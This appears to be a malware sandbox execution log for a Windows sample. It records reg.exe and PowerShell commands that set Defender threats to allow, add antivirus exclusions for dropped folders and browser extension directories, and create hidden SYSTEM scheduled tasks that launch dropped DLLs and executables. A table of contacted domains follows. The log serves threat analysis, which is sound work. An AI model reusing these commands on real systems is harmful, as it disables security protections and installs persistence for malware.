C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gtIkoObEa" /SC once /ST 15:29:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gtIkoObEa"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gtIkoObEa"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 15:14:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe\" Wy /kOKwdidno 757674 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"

C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe

C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe Wy /kOKwdidno 757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2800 -ip 2800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 820

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\dAvQqI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\ULWxyeQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "OcPshDNvhDnVmSv"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\oFBZBqb.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\RqGnkYf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\cxgOVhs.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\XoErYOe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 03:02:56 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\KogpVepN\xZQfABZ.dll\",#1 /Mmdidkr 757674" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "MRTHivZIQsRdEanwm"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\KogpVepN\xZQfABZ.dll",#1 /Mmdidkr 757674

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\KogpVepN\xZQfABZ.dll",#1 /Mmdidkr 757674

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1892

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qRhoV1" /SC once /ST 06:32:20 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "qRhoV1"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcebd73cb8,0x7ffcebd73cc8,0x7ffcebd73cd8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2084 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "qRhoV1"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1588 -ip 1588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1104 -ip 1104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 2124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1184

Network

Country Destination Domain Proto
US 8.8.8.8:53 ify.ac udp
US 172.67.211.171:443 ify.ac tcp
US 104.21.20.211:443 oasqi.nxt-psh.com tcp
RU 93.158.134.119:443 mc.yandex.com tcp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 119.134.158.93.in-addr.arpa udp
US 8.8.8.8:53 211.20.21.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 20.90.153.243:443 client.wns.windows.com tcp
US 172.67.194.119:443 oasqi.nxt-psh.com tcp
US 104.26.2.30:443 trk.imghst-de.com tcp
US 172.67.73.113:443 trk.imghst-de.com tcp
US 172.67.73.113:443 trk.imghst-de.com tcp
US 172.67.180.145:443 soneremonasez.shop tcp
US 172.67.180.145:443 soneremonasez.shop tcp
GB 92.123.143.169:80 apps.identrust.com tcp
